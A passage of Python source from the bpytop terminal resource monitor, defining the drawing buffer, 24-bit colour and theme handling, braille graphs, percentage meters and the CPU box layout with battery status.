if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
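#* Usage sketch (illustrative): polling the threaded input reader from a main loop
# Key.start()
# if Key.input_wait(CONFIG.update_ms / 1000):
#     k = Key.get()                        # e.g. "q", "up", "mouse_scroll_up" or a plain character
# Key.stop()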
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
	* .out(*names, clear=False) : Print named buffers (all if none given), clear=True clears them after printing
	* .now(*args) : Prints all arguments as a string
	* .clear(*names) : Clear named buffers, all if no argument
	* .saved_buffer() : Returns all saved buffers as one string
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True):
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True):
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = out
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True):
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
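#* Usage sketch (illustrative): the buffer name modifiers described in the class docstring above
# Draw.buffer("demo", "first part")        # create/overwrite buffer "demo"
# Draw.buffer("+demo!", " second part")    # "+" appends to the buffer, "!" prints it immediately
# Draw.out("demo", clear=True)             # print named buffer(s), then clear them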
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
color = f'\033[{dint};2;{c};{c};{c}m'
elif len(hexa) == 7:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
except ValueError as e:
errlog.exception(f'{e}')
else:
color = f'\033[{dint};2;{r};{g};{b}m'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
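#* Usage sketch (illustrative): Color objects render to 24-bit escape sequences
# warn = Color("#ff3050")                  # 6 digit hex; a 2 digit value like "#f5" gives grayscale
# Draw.now(f'{warn}alert!{Term.fg}')       # __str__ returns the escape sequence
# Draw.now(warn("also colored"))           # __call__ wraps its arguments and resets to the default fg/bg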
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = NotImplemented
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
tdict["graph_text"] = tdict["inactive_fg"]
if not "meter_bg" in tdict and "inactive_fg" in tdict:
tdict["meter_bg"] = tdict["inactive_fg"]
if not "process_start" in tdict and "cpu_start" in tdict:
tdict["process_start"] = tdict["cpu_start"]
tdict["process_mid"] = tdict.get("cpu_mid", "")
tdict["process_end"] = tdict.get("cpu_end", "")
#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
for item, value in DEFAULT_THEME.items():
default = False if item not in ["main_fg", "main_bg"] else True
depth = "fg" if item not in ["main_bg", "selected_bg"] else "bg"
if item in tdict:
setattr(self, item, Color(tdict[item], depth=depth, default=default))
else:
setattr(self, item, Color(value, depth=depth, default=default))
#* Create color gradients from one, two or three colors, 101 values indexed 0-100
self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
rgb: Dict[str, Tuple[int, int, int]]
colors: List[List[int]] = []
for name in self.gradient:
rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
colors = [ list(getattr(self, f'{name}_start')) ]
if rgb["end"][0] >= 0:
r = 50 if rgb["mid"][0] >= 0 else 100
for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
for i in range(r):
colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
if r == 100:
break
self.gradient[name] += [ Color.fg(*color) for color in colors ]
else:
c = Color.fg(*rgb["start"])
for _ in range(101):
self.gradient[name] += [c]
#* Set terminal colors
Term.fg = self.main_fg
Term.bg = self.main_bg if CONFIG.theme_background else "\033[49m"
Draw.now(self.main_fg, self.main_bg)
@classmethod
def refresh(cls):
'''Sets themes dict with names and paths to all found themes'''
cls.themes = { "Default" : "Default" }
try:
for d in (THEME_DIR, USER_THEME_DIR):
if not d: continue
for f in os.listdir(d):
if f.endswith(".theme"):
cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
except Exception as e:
errlog.exception(str(e))
@staticmethod
def _load_file(path: str) -> Dict[str, str]:
'''Load a bashtop formatted theme file and return a dict'''
new_theme: Dict[str, str] = {}
try:
with open(path) as f:
for line in f:
if not line.startswith("theme["): continue
key = line[6:line.find("]")]
s = line.find('"')
value = line[s + 1:line.find('"', s + 1)]
new_theme[key] = value
except Exception as e:
errlog.exception(str(e))
return new_theme
class Banner:
'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
out: List[str] = []
c_color: str = ""
length: int = 0
if not out:
for num, (color, color2, line) in enumerate(BANNER_SRC):
if len(line) > length: length = len(line)
out_var = ""
line_color = Color.fg(color)
line_color2 = Color.fg(color2)
line_dark = Color.fg(f'#{80 - num * 6}')
for n, letter in enumerate(line):
if letter == "█" and c_color != line_color:
if n > 5 and n < 25: c_color = line_color2
else: c_color = line_color
out_var += c_color
elif letter == " ":
letter = f'{Mv.r(1)}'
c_color = ""
elif letter != "█" and c_color != line_dark:
c_color = line_dark
out_var += line_dark
out_var += letter
out.append(out_var)
@classmethod
def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
out: str = ""
if center: col = Term.width // 2 - cls.length // 2
for n, o in enumerate(cls.out):
out += f'{Mv.to(line + n, col)}{o}'
out += f'{Term.fg}'
if now: Draw.out(out)
else: return out
class Symbol:
h_line: str = "─"
v_line: str = "│"
left_up: str = "┌"
right_up: str = "┐"
left_down: str = "└"
right_down: str = "┘"
title_left: str = "┤"
title_right: str = "├"
div_up: str = "┬"
div_down: str = "┴"
graph_up: Dict[float, str] = {
0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
}
graph_up_small = graph_up.copy()
graph_up_small[0.0] = "\033[1C"
graph_down: Dict[float, str] = {
0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
}
graph_down_small = graph_down.copy()
graph_down_small[0.0] = "\033[1C"
meter: str = "■"
up: str = "↑"
down: str = "↓"
left: str = "←"
right: str = "→"
enter: str = "↲"
ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'
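#* Note (illustrative): the graph_up/graph_down dicts are keyed as <left>.<right> where each side is a
#* fill level 0-4, e.g. graph_up[2.3] draws the left braille column at level 2 and the right at level 3;
#* Graph._create() below builds these keys as value["left"] + value["right"] / 10.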
class Graph:
'''Class for creating and adding to graphs
* __str__ : returns graph as a string
* add(value: int) : adds a value to graph and returns it as a string
* __call__ : same as add
'''
out: str
width: int
height: int
graphs: Dict[bool, List[str]]
colors: List[str]
invert: bool
max_value: int
color_max_value: int
offset: int
current: bool
last: int
symbol: Dict[float, str]
def __init__(self, width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None):
self.graphs: Dict[bool, List[str]] = {False : [], True : []}
self.current: bool = True
self.width = width
self.height = height
self.invert = invert
self.offset = offset
if not data: data = [0]
if max_value:
self.max_value = max_value
data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling
else:
self.max_value = 0
if color_max_value:
self.color_max_value = color_max_value
else:
self.color_max_value = self.max_value
if self.color_max_value and self.max_value:
color_scale = int(100.0 * self.max_value / self.color_max_value)
else:
color_scale = 100
self.colors: List[str] = []
if isinstance(color, list) and height > 1:
for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph
if invert: self.colors.reverse()
elif isinstance(color, Color) and height > 1:
self.colors = [ f'{color}' for _ in range(height) ]
else:
if isinstance(color, list): self.colors = color
elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ]
if self.height == 1:
self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small
else:
self.symbol = Symbol.graph_down if invert else Symbol.graph_up
value_width: int = ceil(len(data) / 2)
filler: str = ""
		if value_width > width: #* If the size of the given data set is bigger than the width of the graph, shrink the data set
data = data[-(width*2):]
value_width = ceil(len(data) / 2)
		elif value_width < width: #* If the size of the given data set is smaller than the width of the graph, fill the graph with whitespace
filler = self.symbol[0.0] * (width - value_width)
if len(data) % 2: data.insert(0, 0)
for _ in range(height):
for b in [True, False]:
self.graphs[b].append(filler)
self._create(data, new=True)
def _create(self, data: List[int], new: bool = False):
h_high: int
h_low: int
value: Dict[str, int] = { "left" : 0, "right" : 0 }
val: int
side: str
#* Create the graph
for h in range(self.height):
h_high = round(100 * (self.height - h) / self.height) if self.height > 1 else 100
h_low = round(100 * (self.height - (h + 1)) / self.height) if self.height > 1 else 0
for v in range(len(data)):
if new: self.current = bool(v % 2) #* Switch between True and False graphs
if new and v == 0: self.last = 0
for val, side in [self.last, "left"], [data[v], "right"]: # type: ignore
if val >= h_high:
value[side] = 4
elif val <= h_low:
value[side] = 0
else:
if self.height == 1: value[side] = round(val * 4 / 100 + 0.5)
else: value[side] = round((val - h_low) * 4 / (h_high - h_low) + 0.1)
if new: self.last = data[v]
self.graphs[self.current][h] += self.symbol[float(value["left"] + value["right"] / 10)]
if data: self.last = data[-1]
self.out = ""
if self.height == 1:
self.out += f'{"" if not self.colors else self.colors[self.last]}{self.graphs[self.current][0]}'
elif self.height > 1:
for h in range(self.height):
if h > 0: self.out += f'{Mv.d(1)}{Mv.l(self.width)}'
self.out += f'{"" if not self.colors else self.colors[h]}{self.graphs[self.current][h if not self.invert else (self.height - 1) - h]}'
if self.colors: self.out += f'{Term.fg}'
def __call__(self, value: Union[int, None] = None) -> str:
if not isinstance(value, int): return self.out
self.current = not self.current
if self.height == 1:
if self.graphs[self.current][0].startswith(self.symbol[0.0]):
self.graphs[self.current][0] = self.graphs[self.current][0].replace(self.symbol[0.0], "", 1)
else:
self.graphs[self.current][0] = self.graphs[self.current][0][1:]
else:
for n in range(self.height):
self.graphs[self.current][n] = self.graphs[self.current][n][1:]
if self.max_value: value = (value + self.offset) * 100 // (self.max_value + self.offset) if value < self.max_value else 100
self._create([value])
return self.out
def add(self, value: Union[int, None] = None) -> str:
return self.__call__(value)
def __str__(self):
return self.out
def __repr__(self):
return repr(self.out)
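#* Usage sketch (illustrative): seed a graph with history, then push one new sample per refresh
# g = Graph(width=20, height=2, color=THEME.gradient["cpu"], data=[0, 25, 50, 75, 100])
# Draw.now(Mv.to(2, 2), str(g))            # initial render
# Draw.now(Mv.to(2, 2), g(42))             # shifts the graph left and appends the value (0-100)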
class Graphs:
'''Holds all graphs and lists of graphs for dynamically created graphs'''
cpu: Dict[str, Graph] = {}
cores: List[Graph] = [NotImplemented] * THREADS
temps: List[Graph] = [NotImplemented] * (THREADS + 1)
net: Dict[str, Graph] = {}
detailed_cpu: Graph = NotImplemented
detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 100
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 100
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
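#* Usage sketch (illustrative): meters cache their rendered string per percentage value
# m = Meter(value=50, width=10, gradient_name="cpu")
# Draw.now(Mv.to(3, 2), m(75))             # re-render at 75%; repeated values reuse the cache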
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
height_p: int
width_p: int
x: int
y: int
width: int
height: int
proc_mode: bool = True if (CONFIG.view_mode == "proc" and not ARG_MODE) or ARG_MODE == "proc" else False
stat_mode: bool = True if (CONFIG.view_mode == "stat" and not ARG_MODE) or ARG_MODE == "stat" else False
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
resized: bool = False
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
CpuBox.redraw = True
CpuBox._draw_fg()
Draw.out("cpu")
@classmethod
def draw_clock(cls, force: bool = False):
if force: pass
elif not cls.clock_on or Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
cls.clock = strftime(CONFIG.draw_clock)
clock_len = len(cls.clock[:(CpuBox.width-58)])
now: bool = False if Menu.active else not force
Draw.buffer("clock", (f'{Mv.to(CpuBox.y, ((CpuBox.width-2)//2)-(clock_len//2)-3)}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * 4}'
f'{Symbol.title_left}{Fx.b}{THEME.title(cls.clock[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Symbol.h_line * 4}{Term.fg}'),
z=1, now=now, once=not force, only_save=Menu.active)
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
Draw.buffer("bg", "".join(sub._draw_bg() for sub in cls.__subclasses__()), now=now, z=1000, only_save=Menu.active, once=True) # type: ignore
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
x = 1
y = 1
height_p = 32
width_p = 100
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
cpu = CpuCollector
height_p: int
if cls.proc_mode: height_p = 20
else: height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
return False
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if os.path.isfile("/sys/class/power_supply/BAT0/status"):
try:
with open("/sys/class/power_supply/BAT0/status", "r") as file:
status = file.read().strip()
except:
pass
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
if return_true or cls.resized or cls.redraw:
return True
else:
return False
@classmethod
def _draw_fg(cls):
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{ARG_MODE or CONFIG.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, hh, THEME.gradient["cpu"], cpu.cpu_usage[0])
Graphs.cpu["down"] = Graph(w - bw - 3, h - hh, THEME.gradient["cpu"], cpu.cpu_usage[0], invert=True)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
if cls.battery_status == "Charging":
battery_symbol: str = "▲"
elif cls.battery_status == "Discharging":
battery_symbol = "▼"
elif cls.battery_status in ["Full", "Not charging"]:
battery_symbol = "■"
else:
battery_symbol = "○"
battery_pos = cls.width - len(f'{CONFIG.update_ms}') - 17 - (11 if cls.width >= 100 else 0) - len(battery_time) - len(f'{cls.battery_percent}')
if battery_pos != cls.old_battery_pos and cls.old_battery_pos > 0 and not cls.resized:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(15 if cls.width >= 100 else 5))}'
cls.old_battery_pos = battery_pos
out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += (f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_usage[0][-1])}{Mv.to(y + hh, x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_usage[0][-1])}'
